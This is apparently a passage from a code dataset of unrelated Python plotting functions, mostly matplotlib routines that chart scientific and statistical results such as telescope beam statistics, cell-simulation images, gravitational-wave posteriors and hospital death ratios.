{1:0.3f} mrad\".format( down_beam_rot_y*1000.0, down_beam_rot_y_err*1000.0 )\n print\n\n print\n print \"Downstream Tracker Alignment:\"\n print\n print \"Displacement and rotation of between the two trackers:\"\n print\n print \"X Position = {0:0.3f} +/- {1:0.3f} mm\".format( down_pos_x, down_pos_x_err )\n print \"Y Position = {0:0.3f} +/- {1:0.3f} mm\".format( down_pos_y, down_pos_y_err )\n print\n print \"X Rotation = {0:0.3f} +/- {1:0.3f} mrad\".format( down_rot_x*1000.0, down_rot_x_err*1000.0 )\n print \"Y Rotation = {0:0.3f} +/- {1:0.3f} mrad\".format( down_rot_y*1000.0, down_rot_y_err*1000.0 )\n print", "def plot_results(self, a):\n import matplotlib.pyplot as plt\n fig, axes = plt.subplots(nrows=len(a.data_vars), sharex='all', sharey='all')\n for ax, var in zip(axes, a.data_vars):\n data = a[var]\n plt.sca(ax)\n data.plot(x='time', cmap=plt.cm.viridis_r, yincrease=False, robust=True)\n plt.show()", "def plot_data(data, param_choice, args):\n \n ### set general plot properties\n \n savebase = '/usr/users/iff_th2/duman/Cells_in_LAMMPS/POVRAY/'\n #downlim = -1\n #uplim = sim.lx/4.\n num_ticks = 5\n ax_len = 1.0 # Length of one subplot square box\n ax_b = 0.0 # Beginning/offset of the subplot in the box\n ax_sep = 0.0 # Separation length between two subplots\n total_subplots_in_x = 1 # Total number of subplots \n fig = plt.figure()\n subp = misc_tools.Subplots(fig, ax_len, ax_sep, ax_b, total_subplots_in_x) \n ax0 = subp.addSubplot()\n \n name = ''\n pname = ''\n if param_choice == 'areak': \n name = 'AREAK'\n pname = name + '_eps_' + str(args.eps) + '_fp_' + str(args.fp) + \\\n '_kappa_' + str(args.kappa)\n xlab = '$\\kappa_A$'\n tit = '$\\epsilon=$' + str(args.eps) + ',$f_m=$' + str(args.fp) + \\\n ',$\\kappa=$' + str(args.kappa)\n elif param_choice == 'eps':\n name = 'EPS'\n pname = name + '_fp_' + str(args.fp) + '_areak_' + str(args.areak) + \\\n '_kappa_' + str(args.kappa)\n xlab = '$\\epsilon$'\n tit = '$f_m=$' + str(args.fp) + ',$\\kappa_A=$' + str(args.areak) + \\\n ',$\\kappa=$' + str(args.kappa) \n elif param_choice == 'fp':\n name = 'FP'\n pname = name + '_eps_' + str(args.eps) + '_areak_' + str(args.areak) + \\\n '_kappa_' + str(args.kappa)\n xlab = '$f_{m}$'\n tit = '$\\epsilon=$' + str(args.eps) + ',$\\kappa_A=$' + str(args.areak) + \\\n ',$\\kappa=$' + str(args.kappa) \n elif param_choice == 'kappa':\n name = 'KAPPA'\n pname = name + '_eps_' + str(args.eps) + '_fp_' + str(args.fp) + \\\n '_areak_' + str(args.areak)\n xlab = '$\\kappa$'\n tit = '$\\epsilon=$' + str(args.eps) + ',$f_m=$' + str(args.fp) + \\\n ',$\\kappa_A=$' + str(args.areak) \n base = savebase + name + '/'\n os.system(\"mkdir -p \" + base) \n \n ### plot \n\n subp = misc_tools.Subplots(fig, ax_len, ax_sep, ax_b, total_subplots_in_x) \n ax0 = subp.addSubplot()\n \n x = data.keys()\n y = [1 for j in range(len(data.keys()))]\n print x\n ax0.scatter(x, y)\n ax0.set_xscale('log')\n ax0.set_yscale('log')\n \n for j, p in enumerate(data.keys()):\n \n fname = data[p] \n \n if os.path.exists(fname):\n arr_hand = read_png(fname)\n \n zoom=0.099\n imagebox = OffsetImage(arr_hand, zoom=zoom)\n\n xy = [x[j], y[j]] # coordinates to position this image\n\n ab = AnnotationBbox(imagebox, xy,\n xybox=(0., -0.),\n xycoords='data',\n boxcoords=\"offset points\",frameon=1,pad=.1) \n \n ax0.add_artist(ab)\n \n ### title\n \n ax0.set_title(tit, fontsize=30)\n \n ### labels\n \n ax0.set_xlabel(xlab, fontsize=30)\n #ax0.set_ylabel(\"$F_{s}(q,\\\\Delta t)$\", fontsize=40)\n\n ### limits\n\n #ax0.set_xlim((-1, 15))\n ax0.set_ylim((0.9999, 1.0001))\n \n ax0.grid(1, color='#cccccc', linestyle='--')\n ax0.set_frame_on(False)\n ax0.get_xaxis().tick_bottom()\n ax0.axes.get_yaxis().set_visible(False)\n xmin, xmax = ax0.get_xaxis().get_view_interval()\n ymin, ymax = ax0.get_yaxis().get_view_interval()\n ax0.add_artist(Line2D((xmin, xmax), (ymin, ymin), color='black', linewidth=2)) \n ### ticks\n \n #ax0.xaxis.set_ticks(np.linspace(0, 15, num_ticks, endpoint=True))\n #ax0.yaxis.set_ticks(np.linspace(0, uplim, num_ticks, endpoint=True))\n plt.setp(ax0.get_yticklabels(),visible=False) \n ax0.tick_params(axis='both', which='major', labelsize=30)\n \n ### legend\n\n# ax0.legend(bbox_to_anchor=(1.005, 0.,0.65, 1.), loc=2, borderaxespad=0., \\\n# prop={'size': 20}, mode=\"expand\", frameon=False)\n \n ### save \n \n savepath = base + \"images_per_\" + pname + \".pdf\"\n print savepath\n plt.savefig(savepath, dpi=300, bbox_inches='tight', pad_inches=0.08) \n fig.clf() \n \n return", "def multi_plot(data, fname=None):\n for entry in data['data']:\n plt.plot(entry['x'], entry['y'], label=entry['label'])\n\n plt.title(data['title'])\n plt.xlabel(data['x_label'])\n plt.ylabel(data['y_label'])\n\n #plt.legend(loc='best')\n\n Plotter.show(data['title'], fname=fname)", "def plot_sample(self):\n print(u'plot_sample()')\n data_set = self.data_sets[1]\n scenario = u'Greedy Search'\n titles = [u'Collaborative Filtering', u'Content-based']\n fig, axes = plt.subplots(1, 2, figsize=(10, 5))\n for i, rec_type in enumerate(data_set.missions):\n graph = data_set.folder_graphs + rec_type + '_' + str(15) + u'.txt'\n for strategy in Strategy.strategies:\n m = data_set.missions[rec_type][graph][strategy][scenario]\n m.compute_stats()\n ppl.plot(axes[i], np.arange(STEPS_MAX + 1),\n m.stats, label=strategy, linewidth=2)\n axes[i].set_xlabel(u'#Hops')\n axes[i].set_ylabel(u'Success Ratio')\n axes[i].set_ylim(0, 85)\n axes[i].set_xlim(0, STEPS_MAX * 1.01)\n axes[i].set_title(titles[i])\n ppl.legend(axes[i], loc=0)\n\n\n # plt.suptitle(u'Greedy Search on the BookCrossing for N=15',\n # size='xx-large', x=0.5)\n fig.subplots_adjust(left=0.08, right=0.97, top=0.9)\n\n plt.savefig('plots/sample.png')\n plt.savefig('plots/sample.pdf')", "def plot_prodata_psf(self,font_size=28,img_name='prodata_psf.pdf',img_id=0):\n rawimage = self.raw_image\n dataimage = self.data\n len_mask = self.lens_mask\n plu_mask_out = self.plu_mask\n\n fig, (ax1, ax2, ax3, ax4,ax5) = plt.subplots(1, 5, figsize=(19, 10))\n ax1.imshow((rawimage), origin='lower', cmap=\"gist_heat\")\n ax1.set_title('Original Image', fontsize=font_size)\n ax1.text(rawimage.shape[0] * 0.55, rawimage.shape[0] * 0.8, 'ID='+repr(img_id), size=12, color='white',\n weight=\"bold\")\n ax1.text(rawimage.shape[0] * 0.2, rawimage.shape[0] * 0.05, 'observation', size=20, color='white', weight=\"bold\")\n ax1.axis('off')\n #\n ax2.imshow((dataimage), origin='lower', cmap=\"gist_heat\")\n ax2.set_title('Image Data', fontsize=font_size)\n ax2.text(dataimage.shape[0] * 0.2, dataimage.shape[0] * 0.05, 'image data', size=20, color='white', weight=\"bold\")\n ax2.axis('off')\n #\n ax3.imshow(len_mask, origin='lower')\n ax3.set_title('Lens light', fontsize=font_size)\n ax3.axis('off')\n #\n ax4.imshow(plu_mask_out, origin='lower')\n ax4.set_title('Mask', fontsize=font_size)\n ax4.axis('off')\n#\n psf=self.psf\n ax5.imshow(np.log10(psf), origin='lower', cmap=\"gist_heat\")\n ax5.set_title('lg(PSF)', fontsize=font_size)\n ax5.axis('off')\n\n plt.show()\n fig.savefig(img_name)\n return 0", "def plot_actual_vs_predicted_by_equations(df, x_variable, y_variables, plot_title):\n #Plot results\n df.plot(x=x_variable, y=y_variables, title=plot_title)\n plt.show()", "def plot_data_stats(data_dict, data_bxtxn, data_dt):\n print(onp.mean(onp.sum(data_bxtxn, axis=1)), \"spikes/second\")\n f = plt.figure(figsize=(12,4))\n plt.subplot(141)\n plt.hist(onp.mean(data_bxtxn, axis=1).ravel()/data_dt);\n plt.xlabel('spikes / sec')\n plt.subplot(142)\n plt.imshow(data_dict['hiddens'][0,:,:].T)\n plt.xlabel('time')\n plt.ylabel('neuron #')\n plt.title('Sample trial rates')\n plt.subplot(143);\n plt.imshow(data_bxtxn[0,:,:].T)\n plt.xlabel('time')\n plt.ylabel('neuron #')\n plt.title('spikes')\n plt.subplot(144)\n plt.stem(onp.mean(onp.sum(data_bxtxn, axis=1), axis=0));\n plt.xlabel('neuron #')\n plt.ylabel('spikes / sec');\n return f", "def plot_all(show=True):\n fig, axes = plt.subplots(max_iterations, 1, figsize=(6, 12))\n for t in range(max_iterations):\n with open('results/%s/df_%d.pkl' % (id, t), 'rb') as f:\n df = pickle.load(f)\n with open('results/%s/w_%d.pkl' % (id, t), 'rb') as f:\n w = pickle.load(f)\n axes[t].hist2d(x=df['vision'], y=df['metab'], weights=w, density=True,\n bins=((xticks, yticks)), cmap='magma')\n axes[t].set_ylabel('max metabolism')\n axes[t].set_xticks(vision_domain)\n axes[t].set_yticks((2, 3, 4))\n axes[3].set_xlabel('max vision')\n fig.tight_layout()\n if show:\n plt.show()\n else:\n plt.savefig('results/%s/abc_results.pdf' % id)", "def plot(self, **kwargs):\n\n # get colors\n colors = kwargs.get(\"colors\", GW_OBSERVATORY_COLORS)\n\n # get Result samples\n self._samples = {\n label: value.posterior\n for label, value in self.results.items()\n if isinstance(value, Result)\n }\n\n # get Grid posteriors\n self._grids = {\n label: [value, value.ln_evidence] # store grid and log evidence\n for label, value in self.results.items()\n if isinstance(value, Grid)\n }\n\n # apply offsets for slightly nicer plots axes\n self.parameter_offsets = {parameter: 0.0 for parameter in self.parameters}\n if len(self._grids) == 0 and len(self._samples) == 1:\n for label in self._samples:\n for parameter in self.parameters:\n srange = [\n np.min(self._samples[label][parameter]),\n np.max(self._samples[label][parameter]),\n ]\n label_suffix = \"\"\n\n # offset values\n median = np.median(self._samples[label][parameter])\n relwidth = np.abs((srange[1] - srange[0]) / median)\n\n if relwidth < 1e-4:\n offsetstr = f\"{median:.4e}\"\n a, b = offsetstr.split(\"e\")\n\n if np.abs(int(b)) < 3:\n offsetstr = f\"{median:.4f}\"\n offset = float(offsetstr)\n else:\n offset = float(offsetstr)\n offsetstr = a + rf\"\\!\\times\\!10^{{{int(b)}}}\"\n\n self.parameter_offsets[parameter] = offset\n\n self._samples[label][parameter] -= offset\n label_suffix = rf\" [${{\\scriptstyle {offsetstr}}}$]\"\n\n self.latex_labels[parameter] += label_suffix\n\n colordicts = []\n for j, res in enumerate([self._samples, self._grids]):\n colordicts.append({})\n for i, key in enumerate(res):\n if key in colors:\n colordicts[-1][key] = colors[key]\n elif key.lower() == \"joint\":\n # if using \"Joint\" as the multi-detector analysis key, set the color to black\n colordicts[-1][key] = \"k\"\n else:\n # use PESummary color cycle\n colordicts[-1][key] = list(colorcycle)[\n (j * 2 + i) % len(colorcycle)\n ]\n\n # store original keywords arguments\n origkwargs = kwargs.copy()\n\n # plot samples\n fig = None\n if len(self._samples) > 0:\n kwargs[\"colors\"] = list(colordicts[0].values())\n if self._num_parameters == 1:\n fig = self._1d_plot_samples(**kwargs)\n elif self._num_parameters == 2 and self.plottype != \"corner\":\n fig = self._2d_plot_samples(**kwargs)\n else:\n fig = self._nd_plot_samples(**kwargs)\n\n # restore keywords\n kwargs = origkwargs\n\n if len(self._grids) > 0:\n kwargs[\"colors\"] = list(colordicts[1].values())\n if fig is not None and \"fig\" not in kwargs:\n kwargs[\"fig\"] = fig\n if self._num_parameters == 1:\n fig = self._1d_plot_grid(**kwargs)\n elif self._num_parameters == 2 and self.plottype != \"corner\":\n fig = self._2d_plot_grid(**kwargs)\n else:\n fig = self._nd_plot_grid(**kwargs)\n\n # add further figure information\n if self._num_parameters == 1:\n ax = fig.gca()\n\n # set figure bounds if outside defaults\n if self.parameters[0] in DEFAULT_BOUNDS:\n _set_axes_limits(ax, self.parameters[0], axis=\"x\")\n\n # add injection values\n if self.injection_parameters is not None:\n if self.injection_parameters[self.parameters[0]] is not None:\n ax.axvline(\n (\n self.injection_parameters[self.parameters[0]]\n - self.parameter_offsets[self.parameters[0]]\n ),\n color=kwargs.get(\"injection_color\", \"k\"),\n linewidth=1,\n )\n elif self._num_parameters == 2:\n if \"triangle\" in self.plottype:\n a1, a2, a3 = fig[1:]\n order = [\"x\", \"y\"] if self.plottype == \"triangle\" else [\"y\", \"x\"]\n params = (\n self.parameters[:2]\n if self.plottype == \"triangle\"\n else self.parameters[1::-1]\n )\n\n # set figure bounds if outside defaults\n for param, axes, axis in zip(params, [[a1, a2], [a2, a3]], order):\n for ax in axes:\n _set_axes_limits(ax, param, axis=axis)\n\n self.fig = fig\n return self.fig", "def ratio(gb_data, data_depcode, data_ratio_hospitalises,current_date, data_hospitalises, current_date_file, min_value_80p , nbhospitalises_80p) :\n start = time.time()\n fig, ax = plt.subplots(figsize=(12, 8))\n\n plt.title(f\"Ratio of in-hospital deaths to hospitalizations : {current_date}\", fontsize=20)\n plt.ylabel(\"Total number of deceases / Total number of hospitalized\")\n plt.xlabel(\"Total number of hospitalized\")\n\n for i, txt in enumerate(data_depcode):\n if (data_hospitalises[i] > data_hospitalises.max() * 0.20):\n ax.annotate(txt, (data_hospitalises[i], data_ratio_hospitalises[i]), xytext=(data_hospitalises[i] + 20, data_ratio_hospitalises[i])) \n\n plt.axhline(data_ratio_hospitalises.mean(), color='green', linestyle='--', label=f'average death ratio ({data_ratio_hospitalises.mean():.2f}%)')\n\n plt.axvline(min_value_80p, color='pink', linestyle='-', label=f\"80% of the number of hospitalized people in France are on the right side of the line ({nbhospitalises_80p:.0f} hospitalized)\")\n\n ax.scatter(data_hospitalises, data_ratio_hospitalises)\n\n ax.annotate('updated chart',xy=(1, 0), xytext=(-15, 10), fontsize=15,\n xycoords='axes fraction', textcoords = 'offset points',\n bbox=dict(facecolor = 'white', alpha = 0.9),\n horizontalalignment = 'right', verticalalignment = 'bottom')\n\n ax.yaxis.set_major_formatter(mtick.FormatStrFormatter('%.0f%%'))\n plt.legend()\n\n current_date_file = gb_data['date'].max().strftime('%Y%m%d')\n end = time.time()\n print(\"Time spent on ratio plot: {0:.5f} s.\".format(end - start)) \n plt.show()", "def ResBeam_Stats_plot(n, header_bmaj, header_bmin): \n\n file_dir = 'SpectralCube_BeamLogs'\n basename = '/beamlog.image.restored.' + imagebase + field\n\n # use different basename for the Milky Way range\n if not glob.glob(file_dir + basename +'*.txt'):\n basename = '/beamlog.image.restored.' + imagebase + 'MilkyWay.' + field\n\n \n BEAM_THRESHOLD = []\n \n title1 = 'Restoring beam bmaj standard deviation [arcsec]'\n plt_name1 = 'BmajStdev.png'\n saved_fig1 = fig_dir+'/'+plt_name1\n\n title2 = 'Restoring beam bmin standard deviation [arcsec]'\n plt_name2 = 'BminStdev.png'\n saved_fig2 = fig_dir+'/'+plt_name2\n\n title3 = 'Maximum ratio of beam area'\n plt_name3 = 'max_ratioBA.png'\n saved_fig3 = fig_dir+'/'+plt_name3\n\n title4 = 'Minimum ratio of beam area' \n plt_name4 = 'min_ratioBA.png'\n saved_fig4 = fig_dir+'/'+plt_name4\n \n params = {'axes.labelsize': 10,\n 'axes.titlesize': 10,\n 'font.size':10}\n\n pylab.rcParams.update(params)\n\n beamXPOS, beamYPOS = BeamPosition()\n fig1, ax1 = plt.subplots()\n fig2, ax2 = plt.subplots()\n fig3, ax3 = plt.subplots()\n fig4, ax4 = plt.subplots()\n \n for i in range(0,36):\n bnum = n[i]\n infile = file_dir + basename +'.beam%02d.txt'%(bnum)\n bmaj_stdev, bmin_stdev, beam_threshold, max_ratio_BA, min_ratio_BA = cal_ResBeam_Stats(infile, header_bmaj, header_bmin)\n BEAM_THRESHOLD.append(beam_threshold)\n\n ax1.scatter([beamXPOS[i]], [beamYPOS[i]], s=1400, edgecolors='black', facecolors='none')\n ax1.text(beamXPOS[i], beamYPOS[i]+0.02, n[i], va='center', ha='center')\n ax1.text(beamXPOS[i], beamYPOS[i]-0.02, round(bmaj_stdev, 3), va='center', ha='center', fontsize=8, color='blue')\n\n ax2.scatter([beamXPOS[i]], [beamYPOS[i]], s=1400, edgecolors='black', facecolors='none')\n ax2.text(beamXPOS[i], beamYPOS[i]+0.02, n[i], va='center', ha='center')\n ax2.text(beamXPOS[i], beamYPOS[i]-0.02, round(bmin_stdev,3), va='center', ha='center', fontsize=8, color='blue')\n\n maxplot = ax3.scatter([beamXPOS[i]], [beamYPOS[i]], s=1300, c=[max_ratio_BA], cmap='summer', edgecolors='black', vmin=0, vmax=1.1)\n ax3.text(beamXPOS[i], beamYPOS[i]+0.02, n[i], va='center', ha='center')\n ax3.text(beamXPOS[i], beamYPOS[i]-0.02, round(max_ratio_BA,3), va='center', ha='center', fontsize=8, color='blue')\n \n minplot = ax4.scatter([beamXPOS[i]], [beamYPOS[i]], s=1300, c=[min_ratio_BA], cmap='summer', edgecolors='black', vmin=0, vmax=1.1)\n ax4.text(beamXPOS[i], beamYPOS[i]+0.02, n[i], va='center', ha='center')\n ax4.text(beamXPOS[i], beamYPOS[i]-0.02, round(min_ratio_BA,3), va='center', ha='center', fontsize=8, color='blue')\n \n ax1.set_xlim(0,0.7)\n ax1.set_ylim(0,1.4)\n ax1.tick_params(axis='both',which='both', bottom=False,top=False,right=False,left=False,labelbottom=False, labelleft=False)\n ax1.set_title(title1)\n\n ax2.set_xlim(0,0.7)\n ax2.set_ylim(0,1.4)\n ax2.tick_params(axis='both',which='both', bottom=False,top=False,right=False,left=False,labelbottom=False, labelleft=False)\n ax2.set_title(title2)\n\n ax3.set_xlim(0,0.7)\n ax3.set_ylim(0,1.4)\n ax3.tick_params(axis='both',which='both', bottom=False,top=False,right=False,left=False,labelbottom=False, labelleft=False)\n ax3.set_title(title3)\n plt.colorbar(maxplot, ax=ax3)\n\n ax4.set_xlim(0,0.7)\n ax4.set_ylim(0,1.4)\n ax4.tick_params(axis='both',which='both', bottom=False,top=False,right=False,left=False,labelbottom=False, labelleft=False)\n ax4.set_title(title4)\n plt.colorbar(minplot, ax=ax4)\n\n fig1.savefig(saved_fig1, bbox_inches='tight')\n fig2.savefig(saved_fig2, bbox_inches='tight')\n fig3.savefig(saved_fig3, bbox_inches='tight')\n fig4.savefig(saved_fig4, bbox_inches='tight')\n\n plt.close('all')\n\n return saved_fig1, saved_fig2, plt_name1, plt_name2, saved_fig3, saved_fig4, plt_name3, plt_name4, BEAM_THRESHOLD", "def plot(model, results, filename):\n\n # c = model.compartments.get_one(id='c')\n #\n # rna_1 = model.species_types.get_one(id='rna_1').species.get_one(compartment=c)\n # rna_2 = model.species_types.get_one(id='rna_2').species.get_one(compartment=c)\n # rna_3 = model.species_types.get_one(id='rna_3').species.get_one(compartment=c)\n #\n pops = results.get('populations')\n time = pops.index\n pop_rna_1 = pops['rna_1[c]']\n pop_rna_2 = pops['rna_2[c]']\n pop_rna_3 = pops['rna_3[c]']\n\n pop_atp = pops['atp[c]']\n pop_gtp = pops['gtp[c]']\n pop_utp = pops['ctp[c]']\n pop_ctp = pops['utp[c]']\n\n pop_amp = pops['amp[c]']\n pop_gmp = pops['gmp[c]']\n pop_ump = pops['cmp[c]']\n pop_cmp = pops['ump[c]']\n\n print(pop_rna_1, pop_atp, pop_gtp, pop_utp, pop_ctp)\n\n fig1, axes1 = pyplot.subplots(nrows=3, ncols=1)\n\n axes1[0].plot(time / 3600, pop_rna_1)\n axes1[0].plot(time / 3600, pop_rna_2)\n axes1[0].plot(time / 3600, pop_rna_3)\n axes1[0].set_xlim((time[0] / 3600, time[-1] / 3600))\n axes1[0].set_ylim((0., 10.0))\n axes1[0].legend(loc='upper right')\n\n axes1[1].plot(time / 3600, pop_atp)\n axes1[1].plot(time / 3600, pop_gtp)\n axes1[1].plot(time / 3600, pop_utp)\n axes1[1].plot(time / 3600, pop_ctp)\n axes1[1].set_xlim((time[0] / 3600, time[-1] / 3600))\n # axes1[1].set_ylim((0., 10.0))\n axes1[1].legend(loc='upper right')\n\n axes1[2].plot(time / 3600, pop_amp)\n axes1[2].plot(time / 3600, pop_gmp)\n axes1[2].plot(time / 3600, pop_ump)\n axes1[2].plot(time / 3600, pop_cmp)\n axes1[2].set_xlim((time[0] / 3600, time[-1] / 3600))\n # axes1[2].set_ylim((0., 10.0))\n axes1[2].legend(loc='upper right')\n\n fig1.savefig(filename.format('species'))\n pyplot.close(fig1)", "def pratn_writer(clf, y_true, y_prob, eval_folder, i=''):\n if type(y_true[0]) is not np.ndarray: y_true = [y_true]\n if type(y_prob[0]) is not np.ndarray: y_prob = [y_prob]\n\n img_dir = eval_folder+'/images/'\n if not os.path.exists(img_dir):\n os.makedirs(img_dir)\n\n clf_name = str(clf)[:str(clf).index('(')]+str(i)\n\n enum_list = range(0, len(y_true))\n\n fig, ax1 = plt.subplots()\n ax1.set_xlabel('percent of population')\n ax1.set_ylabel('precision', color='b')\n ax2 = ax1.twinx()\n ax2.set_ylabel('recall', color='r')\n\n mean_prec = 0.0\n mean_rec = 0.0\n mean_pct_above = np.linspace(0,1,1000)\n\n for i in enum_list:\n prec, rec, thres = metrics.precision_recall_curve(y_true[i], y_prob[i])\n prec = prec[:-1]\n rec = rec[:-1]\n skip_size = int(thres.shape[0]/1000.0)\n if skip_size == 0: skip_size = 1\n\tplotting_thres = thres[0::skip_size][::-1]\n plotting_prec = prec[0::skip_size][::-1]\n plotting_rec = rec[0::skip_size][::-1]\n\n how_many = float(len(y_true[i]))\n\n pct_above = [(y_prob[i][y_prob[i] >= value].shape[0])/how_many\n for value in plotting_thres]\n\n pct_above = np.array(pct_above)\n mean_prec += interp(mean_pct_above, pct_above, plotting_prec)\n mean_rec += interp(mean_pct_above, pct_above, plotting_rec)\n\n #ax1.plot(pct_above, plotting_prec, 'b')\n #ax2.plot(pct_above, plotting_rec, 'r')\n\n mean_prec /= len(y_true)\n mean_rec /= len(y_true)\n\n mean_prec[-1] = np.mean([np.mean(enu) for enu in y_true])\n mean_rec[-1] = 1.0\n\n ax1.plot(mean_pct_above, mean_prec, 'b')\n ax2.plot(mean_pct_above, mean_rec, 'r')\n plt.title('Precision, Recall vs % Population')\n plt.savefig(img_dir+'PRATN_Curve_'+clf_name+'.png')", "def plot_apertures(image, ext=1):\n\n hdu = fits.open(image)\n apfile = './database/ape' + image.strip('.fits') + '_{:d}'.format(ext)\n\n b = np.array(\n [i.split()[3:] for i in open(apfile).readlines() if 'begin' in i])\n\n apid = b[:, 0]\n x = np.array([float(i) for i in b[:, 2]])\n\n sci_exts = np.array([i for i in range(len(hdu)) if hdu[i].name == 'SCI'])\n data = hdu[sci_exts[len(sci_exts)/2]].data\n\n profile = np.average(data, 1)\n\n fig = plt.figure(1)\n ax = fig.add_subplot(111)\n\n pmax = profile.max()\n\n ax.plot(np.arange(len(profile))+1, profile/pmax)\n ax.set_ylim(0, 1.1)\n\n for i, j in enumerate(apid):\n ax.annotate(j, xy=(x[i], 1), ha='center')\n ax.axvline(x[i], alpha=.3)\n\n plt.show()", "def initial_plots(runs):\n for run in runs.keys():\n meta = runs[run]\n plot_pdfs(meta)\n plot_priorsamps(meta)\n plot_ivals(meta)\n# if meta.truNz is not None:\n# plot_true(meta)\n timesaver(meta,'iplot',meta.key)", "def PlotEX(df, eom=None, show_plot=True):\n # Ensure 'Study' is in header.\n # TODO: Add code.\n # Obtain exceedence probabilities.\n if eom:\n df_excd = stats.AnnualExceedence(df, eom=eom)\n else:\n df_excd = stats.MonthlyExceedence(df)\n # Get list of variables.\n var_list = set(df_excd.columns.get_level_values('Part B'))\n # Determine number of axes in the figure.\n n_var = len(var_list)\n n_row = np.int(np.around(np.sqrt(n_var)))\n if n_row**2 >= n_var:\n n_col = n_row\n else:\n n_col = n_row + 1\n fig, ax = plt.subplots(nrows=n_row, ncols=n_col, figsize=(16, 9))\n # Remove extra axes, if necessary.\n if n_row * n_col != n_var:\n n_empty = n_row * n_col - n_var\n for k in range(n_empty):\n ax[-1, -(1+k)].remove()\n # Initialize variables for updating axes.\n cur_row = 0\n cur_col = 0\n # Plot each variable.\n for var in var_list:\n df_exc = df_excd.xs(var, level='Part B', axis=1)\n # Initialize parameters for current axis.\n y_min = np.min(df_exc.values)\n y_max = np.max(df_exc.values)\n col_var = df_exc.columns\n # Select current axis.\n if n_row == 1 and n_col == 1:\n ax_cur = ax\n elif n_row == 1:\n ax_cur = ax[cur_col]\n else:\n ax_cur = ax[cur_row, cur_col]\n # Plot study results for each variable.\n for c in col_var:\n sr_plot = df_exc[c]\n label_c = '{} {}'.format(*c[:2])\n ax_cur.plot(sr_plot, label=label_c, linewidth=1.0, alpha=0.7)\n # Set plot title.\n if eom:\n month_name = dt.date(1900, eom, 1).strftime('%B')\n temp_title = 'Exceedence Plot of {} (End of {})'\n ax_cur.set_title(temp_title.format(var, month_name))\n else:\n ax_cur.set_title('Exceedence Plot of {} (All Months)'.format(var))\n # Modify x-axis and y-axis.\n label_c = set(df_exc.columns.get_level_values('Part C'))\n _unit = df_exc.columns.get_level_values('Units')\n _dtyp = df_exc.columns.get_level_values('Data Type')\n unit_d = list(zip(_unit, _dtyp))\n combo_unit = [' '.join(i) for i in unit_d]\n label_u = set(combo_unit)\n ax_cur.set_ylabel('{} ({})'.format(r'/'.join(label_c),\n r'/'.join(label_u)))\n ax_cur.set_ylim(bottom=y_min, top=y_max)\n ax_cur.set_xlabel('Exceedance Probability')\n ax_cur.spines['right'].set_visible(False)\n ax_cur.spines['top'].set_visible(False)\n # Set legend.\n ax_cur.legend(title='Study, Part F')\n # Update current axis.\n cur_col += 1\n if cur_col >= n_col:\n cur_col = 0\n cur_row += 1\n # Adjust layout.\n plt.tight_layout()\n # Add figure notes.\n t = PlotChartNotes()\n if n_row * n_col != n_var:\n x_pos = (1 - n_empty / n_col) + 0.025\n y_pos = (1 / n_row) - 0.025\n plt.figtext(x_pos, y_pos, t, ha='left', va='top', wrap=True)\n else:\n plt.figtext(0.05, 0, t, ha='left', va='bottom', wrap=True)\n plt.subplots_adjust(bottom=0.2)\n # Show plot, if requested.\n if show_plot:\n plt.show()\n # Return figure and axes.\n return fig, ax", "def plot_ave(results_list):\n x_range = range(len(results_list[0]))\n err_x, err_y, std_list = [], [], []\n\n for i in x_range:\n if i % 10 == 0:\n #get average for each generation\n column = [] \n for result in results_list:\n column.append(result[i])\n average = np.average(column)\n \n std_dev = np.std(column)\n err_x.append(i)\n err_y.append(average)\n std_list.append(std_dev)\n\n pylab.errorbar(err_x, err_y, yerr=std_list)\n pylab.show()", "def plot_individual_tm(xdict, ydict, xprop, yprop, documents, spline):\n figure_array = {}\n for item in documents:\n xlabel = \"\\\\textbf{\" + label_dict[xprop] + \"}\"\n ylabel = \"\\\\textbf{\" + label_dict[yprop] + \"}\"\n print str(item[\"path_id\"])\n x = xdict[item[\"path_id\"]]\n y = ydict[item[\"path_id\"]]\n # fig_title = item[\"path_id\"] + \"(\" + item[\"pretty_formula\"] + \")\" # Individual traces\n fig_title = yprop + item[\"cation_type\"] # Plot by cation\n figure_array[item[\"path_id\"]] = plt.figure(fig_title, figsize=(6,6), dpi=plotting_dpi)\n ax = figure_array[item[\"path_id\"]].add_subplot(111)\n ax.scatter(x,y, s=70, zorder=2, color=tm_color_dict[item[\"tm_type\"][0]], linewidths=2.5, edgecolors='black',\n label=item[\"tm_type\"][0])\n if spline:\n tck = interpolate.splrep(x, y, s=0)\n xnew = np.arange(0, 100, 0.1)\n splfit = interpolate.splev(xnew, tck, der=0)\n x = xnew\n y = splfit\n if item[\"path_id\"][-3:] == \"002\":\n ax.plot(x, y, linewidth=2.5, zorder=1, color=tm_color_dict[item[\"tm_type\"][0]], linestyle='dashed')\n else:\n ax.plot(x, y, linewidth=2.5, zorder=1, color=tm_color_dict[item[\"tm_type\"][0]])\n ax.set_xlabel(xlabel, fontsize=24)\n # ax.set_ylim([0,1200])\n # ax.set_xlim([7,22])\n ax.set_ylabel(ylabel, fontsize=24)\n ax.tick_params(axis='x', labelsize=22)\n ax.tick_params(axis='y', labelsize=22)\n border_width = 2\n [i.set_linewidth(border_width) for i in ax.spines.itervalues()]\n plt.tight_layout()\n plt.legend(loc='best', prop={'size': 14})\n plt.rc('text', usetex=True)\n plt.rc('font', family='sans-serif')\n plt.tight_layout()\n plt.show()", "def plot_morphism_output(data, outdir):\n\n # show the distributions for each variable separately\n for col in data.columns:\n ProfilePlotter._plot_1d(data[col], outfile = os.path.join(outdir, col + \".pdf\"))\n\n # later, maybe also show 2d plots etc.", "def plot_p1(data, documentation):\r\n fig, ax = plt.subplots(1)\r\n data = process_data_p1(data)\r\n sns.lineplot(x=\"Academic Year\", y=\"MD_EARN_WNE_P10\", hue=\"CONTROL\",\r\n data=data, ax=ax,\r\n palette=sns.color_palette([\"#9b59b6\", \"#3498db\", \"#e74c3c\"]))\r\n fig.suptitle(\"Yearly Changes of Average Median Earnings of Former \" +\r\n \"Students per College Control Type\")\r\n ax.set(ylabel=\"Average Median Earnings ($)\")\r\n handles, legends = ax.get_legend_handles_labels()\r\n legends = replace_legend_value_mappings(legends, documentation)\r\n ax.legend(handles, legends, loc=\"lower left\")\r\n fig.savefig(join_curdir(\"results\", \"plot_p1.png\"))", "def analyze(data):\n # perform fit\n regr_results = sm.OLS.from_formula('mosquitos ~ temperature + rainfall', data).fit()\n print(regr_results.tvalues)\n \n fig = plt.figure(figsize=(6, 9))\n\n # plot predicted vs. measured mosquito populations from fitted model \n ax0 = fig.add_subplot(3, 1, 1)\n\n parameters = regr_results.params\n predicted = (parameters['Intercept'] + \n parameters['temperature'] * data['temperature'] + \n 